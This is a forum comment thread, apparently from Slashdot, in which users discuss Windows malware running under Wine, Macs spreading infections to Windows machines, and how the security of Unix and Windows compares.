While the Macs are themselves unaffected, they pass along the infection to windows boxes.
That's usually the point where they are found and removed, but the general lack of av for Mac (few choices and most lack functionality/accuracy) along with the perception of macs as immune means that av is rarely installed on macs.
When it is, AV_App_X doesn't detect the malware, whereas AV_App_Y detects, but can't clean, and AV_App_Z has no realtime scanning.
Malware rise (Score:3, Funny)
Strongly misleading headline! (Score:3, Insightful)
Yeah, it can run viruses, but "not all features may work -- in this case, the crippling of the system, immunity to the task manager, identity theft, etc.".
So in fact, it's not a virus anymore. It's just another program. The very point of being a virus is gone. Because the security settings still hold. (Unless you are retarded enough to run a Wine program as root. But in that case you're just asking for it anyway. ^^)
Re: (Score:3, Insightful)
Actually, Wine refuses to run under sudo. I know this because I used to use Windows data recovery programs (that naturally needed root) in Wine on NTFS drives. It used to work surprisingly well.
Wrong (Score:3, Insightful)
From TFA:
If it managed to infect the Wine registry well enough that it's run automatically, I will have to go into the Wine registry to remove it manually. Or I could run a couple of simple commands:
sudo aptitude purge wine;
sudo aptitude install wine;
Wrong. Wine installs stuff in ~/.wine. The above commands don't touch user directories, so he would end up with a fresh system-wide wine installation but the same malware-ridden user config.
Re:Just get hacked, it is easier anyway (Score:5, Insightful)
Linux isn't THAT more secure, it is just less targeted since Windows is 90%+ of the computers.
A properly configured UNIX client system is significantly more secure than any comparable Windows system, even if you don't run a firewall. There are two significant differences: Internet Explorer, and Services.
The security model of IE is inherently flawed and can not be fixed without breaking existing applications. Microsoft is unwilling to take that step.
Windows services are neither run from a superserver nor in virtually all cases do they allow binding to specific ports, and Windows networking (LAN Manager) requires having services with open ports.
These are fairly significant problems that can not be addressed without changes to Windows APIs that are unlikely to happen.
I think Apple is about to learn a real lesson with the iPhone being hacked constantly.
If someone has physical access to the system, all the software security in the world is useless. The iPhone is being attacked by the device's *owners*. These are *local exploits*, much more common and of much less concern than remote ones.
Parent